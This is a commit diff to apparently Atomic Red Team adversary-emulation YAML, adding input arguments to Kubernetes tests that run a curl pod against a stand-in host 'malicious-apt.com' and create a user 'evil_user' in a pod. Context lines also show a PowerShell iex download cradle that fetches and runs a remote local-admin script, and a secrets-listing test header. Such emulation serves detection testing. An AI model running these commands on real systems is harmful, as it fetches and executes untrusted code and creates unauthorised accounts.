adding input args
This commit is contained in:
Hare Sudhan
@@ -1280,6 +1280,14 @@ atomic_tests:
|
||||
description: K8s pod_name to execute the command in
|
||||
type: string
|
||||
default: atomic-insecure-curl
|
||||
remote_url:
|
||||
description: Remote URL to curl
|
||||
type: string
|
||||
default: https://malicious-apt.com
|
||||
image_name:
|
||||
description: Name of the docker image
|
||||
type: string
|
||||
default: curlimages/curl
|
||||
dependencies:
|
||||
- description: kubectl must be installed and configured
|
||||
get_prereq_command: |
|
||||
@@ -1290,4 +1298,4 @@ atomic_tests:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: |
|
||||
kubectl run #{pod_name} --image=curlimages/curl --restart=Never --rm -it -- curl -ksL https://malicious-apt.com
|
||||
kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- curl -ksL #{remote_url}
|
||||
@@ -185,30 +185,33 @@ atomic_tests:
|
||||
command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/0xv1n/dotnetfun/9b3b0d11d1c156909c0b1823cff3004f80b89b1f/Persistence/CreateNewLocalAdmin_ART.ps1')
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: Create a Linux user via kubectl in a Pod
|
||||
description: |
|
||||
Launches a short-lived Alpine pod and creates a Linux user inside the pod.
|
||||
The pod is automatically deleted after execution.
|
||||
supported_platforms:
|
||||
- containers
|
||||
input_arguments:
|
||||
pod_name:
|
||||
description: K8s pod_name to execute the command in
|
||||
type: string
|
||||
default: atomic-linux-useradd
|
||||
username:
|
||||
description: Username of the user to create inside the pod
|
||||
type: string
|
||||
default: evil_user
|
||||
dependencies:
|
||||
- description: kubectl must be installed and configured
|
||||
get_prereq_command: |
|
||||
echo "kubectl must be installed manually"
|
||||
prereq_command: |
|
||||
which kubectl
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: |
|
||||
kubectl run #{pod_name} --image=alpine --restart=Never --rm -it -- sh -lc 'adduser -D #{username} && id #{username}'
|
||||
|
||||
- name: Create a Linux user via kubectl in a Pod
|
||||
description: |
|
||||
Launches a short-lived Alpine pod and creates a Linux user inside the pod.
|
||||
The pod is automatically deleted after execution.
|
||||
supported_platforms:
|
||||
- containers
|
||||
input_arguments:
|
||||
pod_name:
|
||||
description: K8s pod_name to execute the command in
|
||||
type: string
|
||||
default: atomic-linux-useradd
|
||||
username:
|
||||
description: Username of the user to create inside the pod
|
||||
type: string
|
||||
default: evil_user
|
||||
alpine:
|
||||
description: Name of the docker image
|
||||
type: string
|
||||
default: alpine
|
||||
dependencies:
|
||||
- description: kubectl must be installed and configured
|
||||
get_prereq_command: |
|
||||
echo "kubectl must be installed manually"
|
||||
prereq_command: |
|
||||
which kubectl
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: |
|
||||
kubectl run #{pod_name} --image=#{alpine} --restart=Never --rm -it -- sh -lc 'adduser -D #{username} && id #{username}'
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
attack_technique: T1552.007
|
||||
display_name: Kubernetes List Secrets
|
||||
atomic_tests:
|
||||
atomic_tests:
|
||||
- name: List All Secrets
|
||||
auto_generated_guid: 31e794c4-48fd-4a76-aca4-6587c155bc11
|
||||
description: |
|
||||
|
||||
Reference in New Issue
Block a user